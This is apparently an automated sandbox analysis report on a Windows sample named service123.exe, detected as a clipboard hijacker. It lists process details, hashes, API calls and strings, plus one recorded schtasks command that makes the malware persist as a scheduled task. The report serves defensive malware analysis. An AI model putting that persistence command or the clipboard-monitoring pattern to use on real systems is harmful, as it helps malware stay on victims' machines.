Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 00000000.00000003.2351645168.0000000004495000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:16:10
Start date:	14/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\service123.exe"
Imagebase:	0x530000
File size:	314'617'856 bytes
MD5 hash:	C7DE705DEE7C918329739835EB2FFF15
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	03:16:10
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Imagebase:	0xdc0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:16:10
Start date:	14/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:16:12
Start date:	14/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0x530000
File size:	314'617'856 bytes
MD5 hash:	C7DE705DEE7C918329739835EB2FFF15
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:17:02
Start date:	14/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0x530000
File size:	314'617'856 bytes
MD5 hash:	C7DE705DEE7C918329739835EB2FFF15
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	60.3%
Total number of Nodes:	73
Total number of Limit Nodes:	3

Executed Functions

Function 6C2F14B0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 6C2F14CD
_exit.MSVCRT ref: 6C2F151A
_write.MSVCRT ref: 6C2F156A
_close.MSVCRT ref: 6C2F1579

Strings

@, xrefs: 6C3C4AB1
,pAl, xrefs: 6C3C4AED
CONOUT$, xrefs: 6C2F14C6
terminated, xrefs: 6C2F1540

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$,pAl$@$CONOUT$
API String ID: 28676597-3326884968
Opcode ID: 63ef4cd982a0668013add788b7a0144ac399bfe44fef09fb33c754cfa838f703
Instruction ID: 742b645b718a1d55d612b6431479be8baccde092105a848df42743af4ae0c8b8
Opcode Fuzzy Hash: 63ef4cd982a0668013add788b7a0144ac399bfe44fef09fb33c754cfa838f703
Instruction Fuzzy Hash: 34413AB1A083099FDB00EFB9C44566EBBF4AF49318F408A2DE8A5D7640E335D845CF56

Function 0053116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 005311B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00531238
__p__acmdln.MSVCRT ref: 00531261
malloc.MSVCRT ref: 005312EB
strlen.MSVCRT ref: 00531323
malloc.MSVCRT ref: 0053132E
memcpy.MSVCRT ref: 00531344
GetStartupInfoA.KERNEL32 ref: 00531433

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: b178a3fb1e0af607109d881f6c04abf564687b2fde08b0df5f1f262d49b940fa
Instruction ID: b8f2bfe249f03d395e49071a80e0614c92822897150703fff68cdcba9fe71285
Opcode Fuzzy Hash: b178a3fb1e0af607109d881f6c04abf564687b2fde08b0df5f1f262d49b940fa
Instruction Fuzzy Hash: F081AEB59047018FDB18DF79E98836A7FF1FB94740F00492CE9858B311E775A809EBA6

Function 005315B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 005315CD
_exit.MSVCRT ref: 0053161A
_write.MSVCRT ref: 0053166A
_close.MSVCRT ref: 00531679

Strings

terminated, xrefs: 00531640
CONOUT$, xrefs: 005315C6
@, xrefs: 00538341

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$@$CONOUT$
API String ID: 28676597-491099378
Opcode ID: 5d11fa8fac9d28edeebf771aebb09ed30e4e6f5add11cd9576008a63c649d9bd
Instruction ID: cf9021c8f4588645562588ac64ffad691ffd4f3d98d9fc3a8d418ea2b5a9c6c4
Opcode Fuzzy Hash: 5d11fa8fac9d28edeebf771aebb09ed30e4e6f5add11cd9576008a63c649d9bd
Instruction Fuzzy Hash: 8C4149B09087018FDB14DFB9C84966EBBF4BB84704F04892DE899D7390E774D809DB56

Function 005381E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 87
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,0053138E,?,?,00006EA2,0053138E), ref: 00538271
GetProcAddress.KERNEL32 ref: 0053828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,0053138E,?,?,00006EA2,0053138E), ref: 0053829D

Strings

nmEVvKelRdWKouZYOazf, xrefs: 0053827E
TMdMlTZMAWbrEijBWbrEijBRYMr.dll, xrefs: 0053824A
Failed to get function address. Error code: %d, xrefs: 005382E0

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Failed to get function address. Error code: %d$TMdMlTZMAWbrEijBWbrEijBRYMr.dll$nmEVvKelRdWKouZYOazf
API String ID: 145871493-3408637267
Opcode ID: 0e1c4fd5f7b1accaa114257863a57e8604d658e5d7b2838db8821fd4b283d6cc
Instruction ID: a0c639629707fad1a305fc1c897dda838ef80e3957703f3e43510d609e3bd0aa
Opcode Fuzzy Hash: 0e1c4fd5f7b1accaa114257863a57e8604d658e5d7b2838db8821fd4b283d6cc
Instruction Fuzzy Hash: A3318EB68087009FD708AF74ED4A56BBFF4FB95300F118928F89583240EA75D559DB92

Function 00538230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 90
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,0053138E,?,?,00006EA2,0053138E), ref: 00538271
GetProcAddress.KERNEL32 ref: 0053828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,0053138E,?,?,00006EA2,0053138E), ref: 0053829D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0053138E,?,?,00006EA2,0053138E), ref: 005382BD
GetLastError.KERNEL32 ref: 005382DA
FreeLibrary.KERNEL32 ref: 005382F3

Strings

nmEVvKelRdWKouZYOazf, xrefs: 0053827E
Failed to load DLL. Error code: %d, xrefs: 005382C3
TMdMlTZMAWbrEijBWbrEijBRYMr.dll, xrefs: 0053824A

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID: Library$ErrorFreeLast$AddressLoadProc
String ID: Failed to load DLL. Error code: %d$TMdMlTZMAWbrEijBWbrEijBRYMr.dll$nmEVvKelRdWKouZYOazf
API String ID: 1397630947-3182463116
Opcode ID: fcd63972ad82adbaf5b61126e1bab6b3178697e9582da5d68340ed902c829edc
Instruction ID: 77aa37e56be3d2e9d7b8b1c11800bccd4ccffa25ee3b2d771fa50abd7e27baa6
Opcode Fuzzy Hash: fcd63972ad82adbaf5b61126e1bab6b3178697e9582da5d68340ed902c829edc
Instruction Fuzzy Hash: FA11DF769047009BD708AFB8DE4A56A7FF0FB95700F108928F855C7240FF36D509DA92

Function 005313C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00531238
__p__acmdln.MSVCRT ref: 00531261
malloc.MSVCRT ref: 005312EB
strlen.MSVCRT ref: 00531323
malloc.MSVCRT ref: 0053132E
memcpy.MSVCRT ref: 00531344
_amsg_exit.MSVCRT ref: 005313EA
_initterm.MSVCRT ref: 0053140C

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2053141405-0
Opcode ID: 90f9fec40c33847e1c229e3b9540bfd19755c3d1725e3a6d7273aa85606756ac
Instruction ID: 7a0b26177be8042321a85bfe2f1b216eb4bc563a1b85f9cb55c8d28da743b5fa
Opcode Fuzzy Hash: 90f9fec40c33847e1c229e3b9540bfd19755c3d1725e3a6d7273aa85606756ac
Instruction Fuzzy Hash: 614128B49087028FDB18EF75E98836EBFF0BB94700F10492DE98597311EB74A849DB56

Function 005311A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 005311B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00531238
__p__acmdln.MSVCRT ref: 00531261
malloc.MSVCRT ref: 005312EB
strlen.MSVCRT ref: 00531323
malloc.MSVCRT ref: 0053132E
memcpy.MSVCRT ref: 00531344
_amsg_exit.MSVCRT ref: 005313EA
_initterm.MSVCRT ref: 0053140C

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2230096795-0
Opcode ID: 4d2a00e6a28b87157b92fd78d6d466a75610880b1c999906720db8e6a86fcc34
Instruction ID: 117b08fdc70b088d06d989e0f2fccd2f562591711e225d42c878730710994cc1
Opcode Fuzzy Hash: 4d2a00e6a28b87157b92fd78d6d466a75610880b1c999906720db8e6a86fcc34
Instruction Fuzzy Hash: 8C414DB4A047018FDB18DF75E98835EBBF0BB54740F00452DE88587350EB74A849DBA5

Function 00531160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 005311B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00531238
__p__acmdln.MSVCRT ref: 00531261
malloc.MSVCRT ref: 005312EB
strlen.MSVCRT ref: 00531323
malloc.MSVCRT ref: 0053132E
memcpy.MSVCRT ref: 00531344
GetStartupInfoA.KERNEL32 ref: 00531433

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: cf30fae19d9748e1df9757eb04b167e6bf2c82237abb34f3a14c0e0f80c04ad0
Instruction ID: eb5cc42c4ac419f0c310bf400efbc1e2679085399b7b0be37f69e827ebf0e42b
Opcode Fuzzy Hash: cf30fae19d9748e1df9757eb04b167e6bf2c82237abb34f3a14c0e0f80c04ad0
Instruction Fuzzy Hash: E5516DB5A047018FDB18DF74E98876ABFF0FB98740F10452CE9449B350EB71A80ADBA5

Function 6C3C4230 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenMutexA.KERNEL32 ref: 6C3C4259
CreateMutexA.KERNELBASE ref: 6C3C42A3
Sleep.KERNELBASE ref: 6C3C42BF
GetClipboardSequenceNumber.USER32 ref: 6C3C42C8

Strings

uoijNYchjvFkhpkdArrg, xrefs: 6C3C4242, 6C3C428C

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: Mutex$ClipboardCreateNumberOpenSequenceSleep
String ID: uoijNYchjvFkhpkdArrg
API String ID: 3689039344-223431136
Opcode ID: 46bf035ec8a2e2e72047f42d6c0ac4a7269d221ea93743ea2417496c9a5c8e0b
Instruction ID: 2cca24b7308063e1485c665350e49b672bd861b6a0d48612ce835804f6c85898
Opcode Fuzzy Hash: 46bf035ec8a2e2e72047f42d6c0ac4a7269d221ea93743ea2417496c9a5c8e0b
Instruction Fuzzy Hash: 26017E726083069FDB00EFA4C54A76EBBF4AB45344F018918E9C997A40EB75A5498F93

Function 00531296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 005312EB
strlen.MSVCRT ref: 00531323
malloc.MSVCRT ref: 0053132E
memcpy.MSVCRT ref: 00531344

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 2029aba9ab8773d3036d7b33a54c0b52f44df21a78c425a837da7f9e48c6396a
Instruction ID: 45522ff1e86a0f5ceb81c0179bf98c8b72fb04f50813ef91a9aa22ade994088d
Opcode Fuzzy Hash: 2029aba9ab8773d3036d7b33a54c0b52f44df21a78c425a837da7f9e48c6396a
Instruction Fuzzy Hash: 0F315C75D047158FCB18DF64E98836ABBF1FB98300F04852DE94497311E735A80ADF95

Function 005313BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 005312EB
strlen.MSVCRT ref: 00531323
malloc.MSVCRT ref: 0053132E
memcpy.MSVCRT ref: 00531344

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: f0af6047672f904dfc6d858d974e5095e9428c5afb514ca88657e314f7d7dcd1
Instruction ID: 5b99965db046d2b9cf1f9bf5370b34f63e8edebafea1f3416116408be36c98c4
Opcode Fuzzy Hash: f0af6047672f904dfc6d858d974e5095e9428c5afb514ca88657e314f7d7dcd1
Instruction Fuzzy Hash: FC2106B5D057028FCB18DF64E98866DBBF1FB98700F11892DE94897310EB30A90ADF95

Function 6C30B1A0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0e528c6d09f0450dec80ffaf3beec9bf2a435ef24e612d3b81fd5fcfdf122f1
Instruction ID: b3c2099a78f7a0a842a31d481d48d24de81012698f091bf587e7daf644ee2211
Opcode Fuzzy Hash: a0e528c6d09f0450dec80ffaf3beec9bf2a435ef24e612d3b81fd5fcfdf122f1
Instruction Fuzzy Hash: 7F5136B6B45206CFCB04DF69E08055EFBF8BB85308B54455DE9988BB10EB35E9448FA2

Function 6C30B310 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68cc588157a2ea470bbd82c23adef8608061ecf695bed08c1aa95e4c411655d2
Instruction ID: d8906ad2c108707c3c9e560de2c2b3c93e735c57bfc9695da915ef6601b83ed1
Opcode Fuzzy Hash: 68cc588157a2ea470bbd82c23adef8608061ecf695bed08c1aa95e4c411655d2
Instruction Fuzzy Hash: 8D31AFB2745200CFDB149F28D4C164EB7B8BB4630CBA846ACDA508FB55E735E9058F63

Non-executed Functions

Function 6C2FCD00 Relevance: 33.4, APIs: 22, Instructions: 445stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2FCD7D

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: db572b71d958cee99246baf7fce82a226e5a87e195b684f2ca69e65378ea57ac
Instruction ID: 164d05e8e1e5d30e30396684d9d7485b21cb0eac94bff79d3cd6ab9d81520bec
Opcode Fuzzy Hash: db572b71d958cee99246baf7fce82a226e5a87e195b684f2ca69e65378ea57ac
Instruction Fuzzy Hash: 1502057154875E8FD710CF28C044795FBE2AF86318F0986AEECB847791C776A44ACB81

Function 6C300FC0 Relevance: 22.6, APIs: 8, Strings: 4, Instructions: 1647stringCOMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6C300FCA
strlen.MSVCRT ref: 6C300FD4

Strings

inity, xrefs: 6C301E21
, xrefs: 6C30240F
5, xrefs: 6C3014D2
!, xrefs: 6C302C08

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: localeconvstrlen
String ID: $!$5$inity
API String ID: 186660782-1328200385
Opcode ID: 808f58edaf3ed1be047a6b3bdec394729c8690eeb27c462ea9c5738a29fb0eb6
Instruction ID: 8434b648c8bbe948552dd34c099c45639a2abc1fd08a4520b05156b77fe9ab8e
Opcode Fuzzy Hash: 808f58edaf3ed1be047a6b3bdec394729c8690eeb27c462ea9c5738a29fb0eb6
Instruction Fuzzy Hash: 52F23576A087818FD320CF68C18479BBBE0BF89308F11891EE8D997751D776E8448F92

Function 6C378280 Relevance: 17.7, Strings: 14, Instructions: 166COMMON

Download Yara Rule

Strings

Genu, xrefs: 6C378307
random_device::random_device(const std::string&): unsupported token, xrefs: 6C378482
Genu, xrefs: 6C37838F
rdseed, xrefs: 6C3782C8
Auth, xrefs: 6C3782FF
Auth, xrefs: 6C378426
rdrnd, xrefs: 6C3783C8
rand_s, xrefs: 6C378467
rdrand, xrefs: 6C378358
random_device::random_device(const std::string&): device not available, xrefs: 6C378348
hardware, xrefs: 6C378450
Auth, xrefs: 6C378397
Genu, xrefs: 6C37841E
default, xrefs: 6C37829F

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: memcmpstrlen
String ID: Auth$Auth$Auth$Genu$Genu$Genu$default$hardware$rand_s$random_device::random_device(const std::string&): device not available$random_device::random_device(const std::string&): unsupported token$rdrand$rdrnd$rdseed
